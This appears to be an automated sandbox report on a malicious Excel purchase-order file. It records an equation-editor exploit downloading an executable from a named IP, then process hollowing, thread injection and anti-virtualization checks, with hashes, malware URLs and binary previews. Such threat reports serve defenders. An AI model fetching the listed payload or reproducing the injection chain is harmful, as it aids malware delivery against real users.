          Obfuscated Files or Information
          DCSync116
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Software Packing
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 626175 Sample: BON DE COMMANDE POUR CHENOU... Startdate: 13/05/2022 Architecture: WINDOWS Score: 100 45 Multi AV Scanner detection for domain / URL 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 11 other signatures 2->51 11 EQNEDT32.EXE 12 2->11         started        16 EXCEL.EXE 34 26 2->16         started        process3 dnsIp4 43 103.156.91.153, 49171, 80 TWIDC-AS-APTWIDCLimitedHK unknown 11->43 37 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 11->37 dropped 39 C:\Users\Public\vbc.exe, PE32 11->39 dropped 69 Office equation editor establishes network connection 11->69 71 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 11->71 18 vbc.exe 19 11->18         started        41 ~$BON DE COMMANDE POUR CHENOUFI AEK.xlsx, data 16->41 dropped file5 signatures6 process7 file8 35 C:\Users\user\AppData\Local\Temp\bmexo.exe, PE32 18->35 dropped 53 Machine Learning detection for dropped file 18->53 22 bmexo.exe 18->22         started        signatures9 process10 signatures11 55 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 59 Injects a PE file into a foreign processes 22->59 25 bmexo.exe 22->25         started        process12 signatures13 61 Modifies the context of a thread in another process (thread injection) 25->61 63 Maps a DLL or memory area into another process 25->63 65 Sample uses process hollowing technique 25->65 67 Queues an APC in another process (thread injection) 25->67 28 explorer.exe 25->28 injected process14 process15 30 chkdsk.exe 28->30         started        signatures16 73 Modifies the context of a thread in another process (thread injection) 30->73 75 Maps a DLL or memory area into another process 30->75 77 Tries to detect virtualization through RDTSC time measurements 30->77 33 cmd.exe 30->33         started        process17

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          BON DE COMMANDE POUR CHENOUFI AEK.xlsx38%VirustotalBrowse
          BON DE COMMANDE POUR CHENOUFI AEK.xlsx27%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802
          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLinkDownload
          6.0.bmexo.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.2.bmexo.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.2.bmexo.exe.170000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.bmexo.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          6.0.bmexo.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://103.156.91.153/fdcloudfiles/vbc.exej0%Avira URL Cloudsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://103.156.91.153/fdcloudfiles/vbc.exes0%Avira URL Cloudsafe
          http://103.156.91.153/fdcloudfiles/vbc.exe11%VirustotalBrowse
          http://103.156.91.153/fdcloudfiles/vbc.exe100%Avira URL Cloudmalware
          http://java.sun.com0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          www.freerenoadvice.com/ud5f/100%Avira URL Cloudmalware
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://103.156.91.153/fdcloudfiles/vbc.exehhC:0%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          No contacted domains info
          NameMaliciousAntivirus DetectionReputation
          http://103.156.91.153/fdcloudfiles/vbc.exetrue
          • 11%, Virustotal, Browse
          • Avira URL Cloud: malware
          unknown
          www.freerenoadvice.com/ud5f/true
          • Avira URL Cloud: malware
          low
          NameSourceMaliciousAntivirus DetectionReputation
          http://www.windows.com/pctv.explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
            high
            http://investor.msn.comexplorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
              high
              http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                high
                http://wellformedweb.org/CommentAPI/explorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.iis.fhg.de/audioPAexplorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.piriform.com/ccleanerqexplorer.exe, 00000007.00000000.999156746.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1036163361.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1011925093.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987988330.0000000002CBF000.00000004.00000001.00020000.00000000.sdmpfalse
                  high
                  http://www.piriform.com/ccleaner1SPS0explorer.exe, 00000007.00000000.994238368.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019525973.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006887265.0000000008611000.00000004.00000001.00020000.00000000.sdmpfalse
                    high
                    http://103.156.91.153/fdcloudfiles/vbc.exejEQNEDT32.EXE, 00000002.00000002.965939065.00000000035D0000.00000004.00000800.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000000.964387400.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.drfalse
                      high
                      http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.hotmail.com/oeexplorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                        high
                        http://treyresearch.netexplorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://103.156.91.153/fdcloudfiles/vbc.exesEQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                          high
                          http://java.sun.comexplorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.icra.org/vocabulary/.explorer.exe, 00000007.00000000.1038912442.0000000003CF7000.00000002.00000001.00040000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000007.00000000.1034899702.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                            high
                            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.1007066480.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.993998682.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019426082.0000000008575000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.994421316.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019795394.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006658399.0000000008575000.00000004.00000001.00020000.00000000.sdmpfalse
                              high
                              http://investor.msn.com/explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                high
                                http://www.piriform.com/ccleanerexplorer.exe, 00000007.00000000.993794779.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1019795394.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1006658399.0000000008575000.00000004.00000001.00020000.00000000.sdmpfalse
                                  high
                                  http://computername/printers/printername/.printerexplorer.exe, 00000007.00000000.1015141560.00000000046D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://www.%s.comPAexplorer.exe, 00000007.00000000.1034899702.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  low
                                  http://www.autoitscript.com/autoit3explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://support.mozilla.orgexplorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.996739649.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.1001945671.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989754024.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014187603.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                        high
                                        http://103.156.91.153/fdcloudfiles/vbc.exehhC:EQNEDT32.EXE, 00000002.00000002.965721686.000000000062E000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://servername/isapibackend.dllexplorer.exe, 00000007.00000000.1003526577.0000000006450000.00000002.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        low
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        103.156.91.153
                                        unknownunknown
                                        134687TWIDC-AS-APTWIDCLimitedHKtrue
                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                        Analysis ID:626175
                                        Start date and time: 13/05/202217:06:212022-05-13 17:06:21 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 10m 4s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:BON DE COMMANDE POUR CHENOUFI AEK.xlsx
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:13
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:1
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.expl.evad.winXLSX@11/16@0/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:
                                        • Successful, ratio: 35.9% (good quality ratio 34.6%)
                                        • Quality average: 75%
                                        • Quality standard deviation: 28.2%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .xlsx
                                        • Adjust boot time
                                        • Enable AMSI
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Scroll down
                                        • Close Viewer
                                        • Exclude process from analysis (whitelisted): dllhost.exe, audiodg.exe, WerFault.exe, conhost.exe, svchost.exe
                                        • TCP Packets have been reduced to 100
                                        • Excluded IPs from analysis (whitelisted): 104.208.16.94, 52.182.143.212
                                        • Excluded domains from analysis (whitelisted): onedsblobprdcus15.centralus.cloudapp.azure.com, watson.microsoft.com, legacywatson.trafficmanager.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtCreateFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        TimeTypeDescription
                                        17:07:42API Interceptor89x Sleep call for process: EQNEDT32.EXE modified
                                        17:07:55API Interceptor61x Sleep call for process: bmexo.exe modified
                                        17:08:28API Interceptor220x Sleep call for process: chkdsk.exe modified
                                        No context
                                        No context
                                        No context
                                        No context
                                        No context
                                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Category:downloaded
                                        Size (bytes):263783
                                        Entropy (8bit):7.9127214183326275
                                        Encrypted:false
                                        SSDEEP:3072:LODZGPEounb6dFqeTHg1WG3Tpf8o7j8kRSLCXD35Zq66TvNJsd19vQ1/A3wCEGj7:LOtIO6RsBTpfD7lRVq6uJM194uLiC87i
                                        MD5:5AF1C7DD89A535DEE51C3E28B4A74F8D
                                        SHA1:A4BEACE30EF4B975E247AFBAF837E757A5372F7E
                                        SHA-256:039EF59E7502A98D0B9A6A7E7818444F6DBD699A4CDB10A8DBA031222CFDDE6F
                                        SHA-512:28C4CAC036B93D8943D42613DC8C703A66D291393760524C22E0FCD76E7B67CE73E40704C29321E42765364638F0EE3C11AF52922700570BA47AB661B846A7F7
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        Reputation:low
                                        IE Cache URL:http://103.156.91.153/fdcloudfiles/vbc.exe
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L.....Oa.................h....:.....F6............@...........................;...........@...........................................;.P............................................................................................................text....g.......h.................. ..`.rdata...............l..............@..@.data.....9.........................@....ndata........:..........................rsrc...P.....;.....................@..@................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ms-windows metafont .wmf
                                        Category:dropped
                                        Size (bytes):1970
                                        Entropy (8bit):5.125773446782967
                                        Encrypted:false
                                        SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
                                        MD5:30935B0D56A69E2E57355F8033ADF98B
                                        SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
                                        SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
                                        SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ms-windows metafont .wmf
                                        Category:dropped
                                        Size (bytes):4630
                                        Entropy (8bit):5.070400845866794
                                        Encrypted:false
                                        SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
                                        MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
                                        SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
                                        SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
                                        SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ms-windows metafont .wmf
                                        Category:dropped
                                        Size (bytes):4630
                                        Entropy (8bit):5.070400845866794
                                        Encrypted:false
                                        SSDEEP:96:RmljFSTwLmSaj2W67xYK2dlEtF622okgmCCHtkTl9ggBgThsMihEylB8By98Rj:UlRSkCSajh6tL2dlEtFV2VgmVNkTl9gJ
                                        MD5:1A4FF280B6D51A6ED16C3720AF1CD6EE
                                        SHA1:277878BEF42DAC8BB79E15D3229D7EEC37CE22D9
                                        SHA-256:E5D86DD19EE52EBE2DA67837BA4C64454E26B7593FAC8003976D74FF848956E7
                                        SHA-512:3D41BAF77B0BEEF85C112FCBD3BE30E940AF1E586C4F9925DBDD67544C5834ED794D0042A6F6FF272B21D1106D798CBB05FA2848A788A3DAFE9CFBC8574FCECA
                                        Malicious:false
                                        Preview:...................[R..................................D.^...................-...................".....-...........................".....-.....................-...............$...........o.............................-...............-.......-.....................-...............$.......W.....i...T.........-...............-.......-.....................-...........>...$.....~.........................z...m.....H.v.....?.........................|...r...f...Z...L...>...0... .............~.....-...............-.......-.....................-...........6...$.....................................-...?...U...n...........!...!.........................................-...............-.......-.....................-...........8...$.......................s...e.g.\.L.Y./.[..._...g...p...~.............'.../...L.v.g.i...V...@...'...............-...............-.......-.....................-........... ...$.......................r...{...................................-...............-.......-...........
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                        Category:dropped
                                        Size (bytes):223752
                                        Entropy (8bit):3.2805343869701504
                                        Encrypted:false
                                        SSDEEP:1536:gAGsM8yOYZWQ99d99H9999999lN6Hz8iiiiiiiiiiiiiiiPnHnbq+QVwtaKfdL4a:gMMVNSztnZft6rMMVNSztnZft6u
                                        MD5:8E3A74F7AA420B02D34C69E625969C0A
                                        SHA1:4743F57F0F702C5B47FA1668D9173E08ADA16448
                                        SHA-256:0CD83C55739629F98FE6AFD3E25A5BCBB346CBEF58BC592C1260E9F0FA8575A9
                                        SHA-512:ADE6B91E260AFA08CC286471D0AD7BCA82FF5E1FE506D48B37A13E3CDD2717171CDAC38C77CFF18FD4C26CA9470B002B63B7FDDC0466FC6F7010A772BF557054
                                        Malicious:false
                                        Preview:....l................................... EMF.....j..........................8...X....................?......F...........GDIC...............p.........8.........................F...........................A. ...........F.......(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:ms-windows metafont .wmf
                                        Category:dropped
                                        Size (bytes):1970
                                        Entropy (8bit):5.125773446782967
                                        Encrypted:false
                                        SSDEEP:48:KxK48S3oEL48I+KL48uL48kL48tnL48I0L48Ih2L48Ls4fnPK6L48tOL48bCb3RM:KxKS3okSuEtN1O2FfUcM
                                        MD5:30935B0D56A69E2E57355F8033ADF98B
                                        SHA1:5F7C13E36023A1B3B3DAF030291C02631347C2AB
                                        SHA-256:077232D301E2DF2E2702BD9E7323806AC20134F989C8A4102403ECBF5E91485E
                                        SHA-512:5D633D1EC5559443D3DA5FAD2C0CFC5DBF6A006EF6FBEE8C47595A916A899FBDF713897289E99EE62C07B52CCB61578253791AC57712DF040469F21287A742E9
                                        Malicious:false
                                        Preview:.....F.>...u........R........................u.F.............................-...................".....-...........................".....-....................-...........F...$.!.....!...*...2...9...?...C...F...G...F...C...?...9...2...*...!.........................................................................................-...............-.......-....................-...............$...[...6._...x.[.......-...............-.......-....................-...............$...o.D...x.#.w...G.o.D.....-...............-.......-....................-...............$.........!.V.{...y.............-...............-.......-....................-...............$.....M.w...n.@.[.....M.....-...............-.......-....................-...............$.......f...Q...........-...............-.......-....................-...............$...'.U.....K...'.U.....-...............-.......-....................-...............$.c...u...\...D...,.........j...S...=...%.........x...c...N...:...&.v...p...
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):80384
                                        Entropy (8bit):6.294104149845472
                                        Encrypted:false
                                        SSDEEP:1536:k6TaC+v1wwfr0oxAomP3cX/4pi2sWjcd8dI:la5CwD1/ui58W
                                        MD5:FD42CBBC6D53AD34694C46731AABD852
                                        SHA1:BE1B3AF37A4E54040EDFBA4A728D5316181ACE7D
                                        SHA-256:2092286C74AA5DF753BE3FBDC6D3194104E89FC1C4A8E1BECEF8AE825FE4D052
                                        SHA-512:AEE5FA5F2D81965112518A3FFFB28ADD9F7A52545A686042D1EF8CA81F970ACF7B88BC7AF1FA3E789F07918A5A7DBF152A3A71E97D23CD2FD6EC21BBD609E799
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w...%`..w...%^..w...%a.w......w...w..w..p....w..p.~..w..p....w..Rich.w..................PE..L...8.~b............................7.............@.......................................@..................................$.......p..................................T...............................@............................................text...U........................... ..`.rdata...N.......P..................@..@.data... 1...0......................@....rsrc........p.......*..............@..@.reloc...............,..............@..B................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):4810
                                        Entropy (8bit):6.182005918340119
                                        Encrypted:false
                                        SSDEEP:96:rvS/az70J2n6QKA9e3vYlKb23QPMW5Ba/3jy:Ttv0J1QKA4pb23bW5Ba/3W
                                        MD5:086741FA34CD34B27FB9B5EBA9783209
                                        SHA1:456B182F04DE595E5971C702BDEA0F2E6F5E81E1
                                        SHA-256:2EA0C458D3E8B5A1C217A3A5EB4B5115653C92AEFC8D920E111862413ACBCAF0
                                        SHA-512:66E6B4BF7FA709384847A848EFE0CA2DF8F3A2B953F27AD320F00D7A0912EB6A07BFC58D157CE765271AACC872E03043AC7564C4916BE61ECBA6B44FE8FBD8A4
                                        Malicious:false
                                        Preview:j..QQ6.}.}.034..aQ.4.....4....i..YQD.m.QQQ..UQl.l...Y.ihQQQ...6Ml.l...Y.icQQQ..A.6.l.l...Y.iBQQQ..I.6]l.l...Y.i-QQQ....6E.....9.....z...6e...i..J..i..}..i..m.......:Tb..i.6m..?..m43..U.ea..iQQQQ....X..ml.:l.A.l.I.9l...:l..l.i..S.....T....U..{R.al.........a..miQQQQD...QQQ....X..U....a...J?.Q6.}..4....Y...Q.......Q..........6Y..m...Q....R..Y.6mJ?.Q..gC.i..QQi..QQ?.Q..lL.i1.QQi3.QQ?.Q....i..QQi..QQ?.Q6.}.}..4....iD.Y.QQQ....m..YQ....mCQQ..m...m..Y...Yxei.QQ......z..:.JQ....5.M..iz..:..Q....5.M....9..Q......lL.iXRQQ.i.nll..Ux...i.l.i.lll..U..UQ...aQx.D.aRQQQ..aJ?.Q6.}.}..4....iD.Y.QQQ.....m..YQ....mCQQ..m...m..Y...Yxeiz.QQ.....QQQ..z..:.JQ....5.E..z..:..Q....5.E..z..:B.....5.E....J.............E..iz..:.......5.E....9..Q......gC.i_QQQ.ijmll..U...Q...i....Rx.l..l..l.l.l.i.kll..U..UQ...aQx.D.aRQQQ..aJ?.Q6.}.}.D.Y.QQQ..e..m..YQ....mCQQ..m...m..Y...Yxei..QQ......z..:.JQ..e.5.i..z..:..Q..e.5.i....9..Q..e.....i.QQQ.i.mll..Ux.l.l.i.nl
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):274451
                                        Entropy (8bit):7.534851581609414
                                        Encrypted:false
                                        SSDEEP:3072:ldMe5ejQJleaiQ9c4aFvhp5Vg7AAuydCXpXqvFJCkOVyj4Fyjda5CwD1/ui58W:ceJFShpjupdCZqvLVO+WCkx
                                        MD5:384A5748B417139E08ACEEDD769BCF46
                                        SHA1:EBC2F56F76E58CE024678D56C3D06ECE94832C6C
                                        SHA-256:8B49AAEA3CE6F914D1E2C7B48902B9E3D44BAC9013A8FE6826000FB6E48654AC
                                        SHA-512:43798CFE7F8C28DA3DA98D7E51B3A4D60DCB5EE4F90086A1684B182478D6F7F9A0D0DA554ED1094B5EFB429A434FCFC58BAD115AEC53FDD67FEEE37E8B8177AA
                                        Malicious:false
                                        Preview::5......,...................m....%......p4......:5..........................................................................................................................................................................................................................................G...............9...j...............................................................................................................................K...........#...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\Public\vbc.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):175615
                                        Entropy (8bit):7.99037693756646
                                        Encrypted:true
                                        SSDEEP:3072:tdMe5ejQJleaiQ9c4aFvhp5Vg7AAuydCXpXqvFJCkOVyj4FyX:EeJFShpjupdCZqvLVO+X
                                        MD5:E5D98C0DED859D8A94EFF3DE479F7EC5
                                        SHA1:86ACE17C40569BA09C5AA4792969F9709E398A56
                                        SHA-256:9A974A3EF1A34282E6502D2BF42E6A8011BD42D126875CE15DEC0F9A8B030E43
                                        SHA-512:4770FDFA2899C6FD56FA8A39E7ABF45B9A9B42EF1F8193F8E7F310E1B219A098EF938A34B5C73D6403C942BC70CEC87DF1049E4DA715E6740041956050887E88
                                        Malicious:false
                                        Preview:T....-.......H....H.e.7..trc......i..R3xa.-T..<.Z%..@.../`C.}...i.DnqO.....>n.......%C{..S.~........._.X...Nm..R.Kh.....^l.][....].....i..8.V..=......<.DZ2.il..|..N..z.....bZ..6...j...,Z_..s...........Z...Mv.......X....w..(.d.........Q=#..........-..x....L.D........O...rc.....&.i..R3.a.-T..<.Z%..@.X../. .s.1.E4w...Qy.m.8..+.C..a.k.....;.Q..j...xL`...=...Kh.....].l...+.|ikh.. .C.*..0Q..{.>|.B..|..$.w.~{.......TaJ....#............Z_..s...?.0f...P/..Mv....Y..X...w..(.d.........=4....j.:....-..Y..\.L.D.....C....Jrc......i..R3xa.-T..<.Z%..@.X../. .s.1.E4w...Qy.m.8..+.C..a.k.....;.Q..j...xL`...=...Kh.....].l...+.|ikh.. .C.*..0Q..{.>|.B..|..$.w.~{.......z..... U...........,Z_..s...?.0f....P...Mv....Y..X...w..(.d.........=4....j.:....-..Y..\.L.D.....C....Jrc......i..R3xa.-T..<.Z%..@.X../. .s.1.E4w...Qy.m.8..+.C..a.k.....;.Q..j...xL`...=...Kh.....].l...+.|ikh.. .C.*..0Q..{.>|.B..|..$.w.~{.......z..... U...........,Z_..s...?.0f....P...Mv....Y..X...
                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                        File Type:CDFV2 Encrypted
                                        Category:dropped
                                        Size (bytes):95744
                                        Entropy (8bit):7.924269341639024
